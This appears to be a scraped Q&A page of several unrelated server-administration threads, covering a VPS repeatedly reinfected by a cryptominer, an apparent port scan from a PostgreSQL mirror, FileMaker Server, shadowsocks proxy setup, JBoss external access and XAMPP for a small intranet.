My VPS server that hosted in Google Cloud regullary attacked by cryptocurrency Malware.
It running from "/tmp/init" and taking all CPU resources.
What I do is kill the process and remove /tmp/init file.
I dont know how, but after several days, /tmp/init will appear again and running.
I have tried to find the source where it come from using several rootkit tools such as rkhunter, lynis, chkrootkit and clamav but nothing is found and all configuration is OK.
there are 3 port that open from outside world:
80 (apache web server), 20 (only accept private key without root login) and 8983 (Apache Solr)
is there any good tools to find the cause or is there any way to prevent this happen?
Thank you
Related
I have an Ubuntu VM installed on a client's VMware system. Recently, the client's IT informed us that his firewall has been detecting consistent potential port scans to our VM's internal IP address (coming from 87.238.57.227). He asked if this was part of a known package update process on our VM.
He sent us a firewall output where we can see several instances of the port scan, but there are also instances of our Ubuntu VM trying to communicate back to the external server on port 37258 (this is dropped by the firewall).
Based on a google lookup, the hostname of the external IP address is "feris.postgresql.org", with the ASN pointing to a European company called Redpill-Linpro. As far as I can tell, they offer IT consulting services, specializing in open source software (like PostgreSQL, which is installed on our VM). I have never heard of them before though and have no idea why our VM would be communicating with them or vice-versa. I'm also not sure if I'm interpreting the IP lookup information correctly: https://ipinfo.io/87.238.57.227
I'm looking for a way to confirm or disprove that this is just our VM pinging for a standard postgres update. If that's the case I'd like to restrict this behaviour. We would prefer to do these types of updates manually and limit the communication outside of the VM to what is strictly necessary for the functionality of our application.
Update
I sent an email to Redpill's abuse account. They responded quickly saying that the server should not be port scanning anyone and if it appears that way, something is wrong.
The server is part of a cluster of machines that serves apt.postgresql.org among other postgres download sites. I don't think we have anything like ansible or puppet installed that would automatically check for updates but I will look into that to make sure. I'm wondering if Ubuntu reaching out to update the MOTD with the number of available packages would explain why our VM is trying to reach out to the external postgres server?
The abuse rep said in any case there should only be outgoing connections from the VM, not incoming. He asked for some additional info so I will keep communicating with him and try to update this post accordingly
My communication with the client's IT dropped off so I did not get a definitive answer on this, but I'll provide some new details:
I reached out to the abuse email for Redpill-Linpro. He got back to me and confirmed the server corresponding to the detected IP address is part of a cluster that hosts postgres download sites, including apt.postgresql.org. He was surprised to learn we had detected a port scan from their server and seems eager to figure out why that is happening.
He asked if the client IT could pass along some necessary info for them to set up tracking on that server. But the client IT never got back to me. I think he was satisfied that it wasn't malicious and stopped pursuing it.
Here's one of the messages the abuse rep sent me that may be relevant:
That does look a lot like the tcp to the apt download server yes. It's
strange that your firewall reports that many incoming connections, but
they could be fallout from some connection tracking that's not
operating as intended. The timing appears to be matching up more or
less perfectly. And there should definitely not be any ping-back
connections from it.
Since you appear to be using the http version of the server (and not https) bringing the data in cleartext, they should be able to just
dump the TCP connection contents and verify exactly what it does. But
I bet they are going to see a number of http requests initiated by the
apt client that is checking for updates.
I am just starting out with FileMaker and have run into a problem with FileMaker Server 19. I have a client file that I have shared with the server which is showing up as expected in the FMS Admin console under the Databases tab. However, when I try to open it to make it active in FM Server, it won't open.
The only message I receive is that the host's capacity has been exceeded, which doesn't make sense since it is a fresh install and no clients have been hosted yet.
I have looked around online to try to find a solution but haven't found anything that works. Most solutions refer to the number of simultaneous clients permitted by FM Server.
Any help is much appreciated.
I'm a new comer to using the overseas server. Recently I bought a vps from virmach in order to see foreign websites like google and wiki.
I've been trying for a long time configuring my shadowsocks on my server.
However, when I was using shadowsocks-qt5 to connect my server, it was timeout.
And of course I can't access google correctly.
What I want to ask is the reason why I failed.
Here are things that I do remember to do:
stop the firewall on both computers;
build the .json file which I referred to blogs in China.
Here are the outline of my shadowsocks.json on my server:
{
"server":"0.0.0.0",
"server_port":8388,
"local_address":"127.0.0.1",
"local_port":1080,
"password":"XXXX",
"timeout":600,
"method":"aes-256-cfb"
}
Other useful(maybe) information:
my client OS version: Ubuntu 18.04.3 LTS
my server OS version: Ubuntu 16.04.6 LTS
the client I choose is from: https://github.com/shadowsocks/shadowsocks-qt5
I could not help but wandered, are there any other possible reasons I've forgot? Can anyone inform me some helpful details to solve this puzzling problems? Thanks a lot!
I have not set up my own VPS but I have instead subscribed to the server provided by caonima.io, so I can't speak for any server related issues. Additionally, I have no affiliation with caonima.io. I did however successfully set up my client on Ubuntu 16.04 after having some issues connecting to GFW-blocked (China's Great FireWall) websites.
From what I understand from my solution, the client configuration is NOT the only step of setup. There are two layers of proxy access that need to be completed:
Client Configuration. Configure your client with the server and connection information. A successful connection looked like this for me with my command line interface
shadowsocks-libev command line client successful connection
System or Browser Proxy Configuration. You will need to configure either your browser or web access tool to use a proxy, or set system-wide proxy settings. To set system wide proxy settings, go to system settings > network > network proxy and enter the proxy information. Setting Socks host to localhost:1080 resulted in successful GFW-blocked website access (as shown below)!
Ubuntu network settings proxy manual configuration
On beforehand I have to say i'm a bit of a newbie.
I've sucscribed to a VPS with Ubuntu 11.04 server, I installed Jboss and am starting it with the -b 0.0.0.0 option.
Now if I lookup the address ip:8080 on a browser on the VPS itself it's working fine, but if I try to look it up on a browser on an external machine it isn't able to access the page.
I tried to modify the hosts file but without success. Maybe its the iptables? Or something else?
I really appreciate any help thanks.
Take the static IP of the server, ping that from your command line tool with ping. If you are successful in pinging the server you are all set. Now go to the browser of the external pc and type the static ip and give the port as 8080. It will certainly work.
Some good suggestion from my side is, try PaaS(platform as a service) now as that is much easier than VPS and you will get up and running in minutes. Try Jelastic. It has got JBoss hosting. Deploy your WAR file there and you can access it immediately. Ket me know if you really go ahead and use it.
Surya
my company wants to set up a small intranet portal on LAN. We are about 100 users at max. I am thinking about Joomla on a windows server environment with XAMPP.
Just to be safe, is XAMPP efficient for serving about 50 to 100 users ? Does it have some connection limits ? Also how about using it as a webserver for a small intranet portal.
Have your say guys.
XAMPP is "just" a collection of established applications for serving web pages. The underlaying apache can handle far more that the expected 100 users.
I haven't tried it yet, but think that maybe even the out-of-the-box configuration might be sufficient - if not you can always modify the underlaying Apache and/or MySQL database according to your needs.
XAMPP is just a handy single-click installer for Apache/MySQL/PHP which is all you need to run Joomla. This stack powers some of the largest websites on the net, so I don't think you'll run into any problems there. The specs of the server are what you should be most concerned about, but any low-range server should be able to handle that capacity without blinking.
Just be aware that the default settings used by XAMPP are specifically designed for developers working on their own local machines: there's no root password for MySQL, permissions are very relaxed, etc. Take some time to go through the config after you set it up.
You could also look at WAMP, depending on your requirements. Similar sort of thing but with the same issues that nickf stated.